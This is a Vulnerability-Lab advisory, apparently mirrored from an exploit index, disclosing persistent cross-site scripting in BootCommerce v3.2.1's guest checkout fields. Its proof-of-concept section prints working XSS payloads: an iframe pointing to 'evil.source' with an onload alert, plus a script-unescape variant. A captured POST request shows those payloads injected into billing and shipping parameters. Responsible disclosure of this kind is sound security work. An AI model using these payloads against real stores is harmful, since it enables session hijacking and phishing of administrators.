Share
## https://sploitus.com/exploit?id=VULNERABLE:2279
Document Title:
===============
BootCommerce v3.2.1 - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2279


Release Date:
=============
2022-06-07


Vulnerability Laboratory ID (VL-ID):
====================================
2279


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
E-commerce solution based on twitter bootstrap,perfect for any kind of shops. A complete “Control Panel” to manage Products, 
Categories, Orders,Clients and many system options.

(Copy of the Homepage: https://codecanyon.net/item/bootcommerce-ecommerce-twitter-bootstrap-based/5702921 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the official BootCommerce v3.2.1 cms web-application.

Affected Product(s):
====================
MrPlugins
Product: BootCommerce v3.2.1 - (PHP) (CMS) (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-08-00: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-06-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official BootCommerce CMS v3.2.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to 
web-application requests from the application-side.

The vulnerabilities are located in the input fields of the billing address and shipping address module affecting check_out.php. Remote attackers 
can use the guest order option to inject own malicious persistent script code with the order process to provoke an execute of code in the frontend 
and backend to compromise. The order process allows unregistered users to order and checkout with artcle items were the contents are wrong sanitized.
After the order process the wrong validated content is delivered to the backend were an execute takes place on preview or interaction.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious 
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Order Progress

Vulnerable File(s):
[+] check-out.php

Vulnerable Input(s):
[+] Name
[+] Lastname
[+] Email
[+] Phone
[+] Fax
[+] Address
[+] Zip code
[+] City

Vulnerable Parameter(s):
[+] name
[+] lastname
[+] email
[+] phone
[+] fax
[+] address
[+] zip code
[+] city

Affected Module(s):
[+] order summary)
[+] orders (backend on preview)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the application
2. Start to tamper the browser session
2. Move to order an products to buy
3. Choose the guest option
4. Inject test payload to the vulnerable input fields
5. Process to continue the steps ...
6. First execute of code takes place in the summary
7. Second execute takes place in the backend for administrators on preview of the order
8. Successful reproduce of the vulnerability!


Exploitation: Payload
<script>document.write(unescape("%22%3Ciframe%20src%3Devil.source%20onload%3Dalert%28document.domain%29%3E%3C/iframe%3E"));</script>
"<iframe src=evil.source onload=alert(document.domain)></iframe>


Vulnerable Source: Order Progress -  Order Sumamry
<tr style="border-top:1px solid #E6E6E6;background-color:#fff!important;">
<td class="text-left" colspan="0"><br>
<strong class="text-info">Billing Address</strong>
<span class="billing-address-container"><address><strong>1"&gt;"<iframe src=evil.source onload=alert(document.domain)></iframe> 
2"&gt;"<iframe src=evil.source onload=alert(document.domain)></iframe></strong><br>
4"&gt;<iframe>%20>"<iframe src=a></iframe><br>6"&gt;<iframe>%20>"<iframe src=a></iframe> - 
5"&gt;<iframe>%20>"<iframe src=a></iframe><br><abbr title="Phone">T: </abbr> 3"&gt;<iframe>%20>"<iframe src=a><br/><abbr title="Fax">F: 
</abbr> 354123542<br/><abbr title="E-mail">@: </abbr> XXX@protonmail.com</address></iframe></address></span></td>
<td class="text-left"><br>
<strong class="text-info">Shipping Address</strong>
<span class="shipping-address-container"><address><strong>7"&gt;"<iframe src=evil.source onload=alert(document.domain)></iframe> 
8"&gt;"<iframe src=evil.source onload=alert(document.domain)></iframe></strong><br>9"&gt;<iframe>%20>"<iframe src=a></iframe><br>
10"&gt;<iframe>%20>"<iframe src=a></iframe> - 
2353245<br><abbr title="Phone">T: </abbr> 145235235<br><abbr title="Fax">F: </abbr> 
1523152354<br><abbr title="E-mail">@: </abbr> XXX@protonmail.com</address></span>
</td></tr>


--- PoC Session logs (POST) ---
https://bootcommerce.localhost:8000/bootcommerce/save-order.php
Host: bootcommerce.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1047
Origin: https://bootcommerce.localhost:8000
Connection: keep-alive
Referer: https://bootcommerce.localhost:8000/bootcommerce/check-out.php
Cookie: PHPSESSID=6f0vgot31ibuni49ci5ec5sj22; initial_user_session=42512cc6bd4a0bc52c22
account_type=guest&useridreg=&passwordreg=&passwordreg2=&is_company=private&name=1"<iframe src=evil.source onload=alert(document.domain)></iframe>&lastname=
2"<iframe src=evil.source onload=alert(document.domain)></iframe>&tax_code=&email=XXXX@protonmail.com&phone=3"<iframe src=evil.source onload=alert(document.domain)></iframe>&
fax=354123542&address=4"<iframe src=evil.source onload=alert(document.domain)></iframe>&zipcode=5"<iframe src=evil.source onload=alert(document.domain)></iframe>&city=6
"<iframe src=evil.source onload=alert(document.domain)></iframe>&names=7"<iframe src=evil.source onload=alert(document.domain)></iframe>&lastnames=8
"><iframe>%20>"<iframe src=a></iframe>&emails=XXXX@protonmail.com&phones=145235235&faxs=1523152354&addresss=9"><iframe>%20
"<iframe src=evil.source onload=alert(document.domain)></iframe>&
zipcodes=2353245&citys=10"<iframe src=evil.source onload=alert(document.domain)></iframe>&payment_method=BT&payment_price=0
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 45
vary: Accept-Encoding,User-Agent
content-encoding: gzip


Reference(s):
https://localhost:8080/bootcommerce/
https://localhost:8080/bootcommerce/check-out.php


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities in the ecommerce application are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™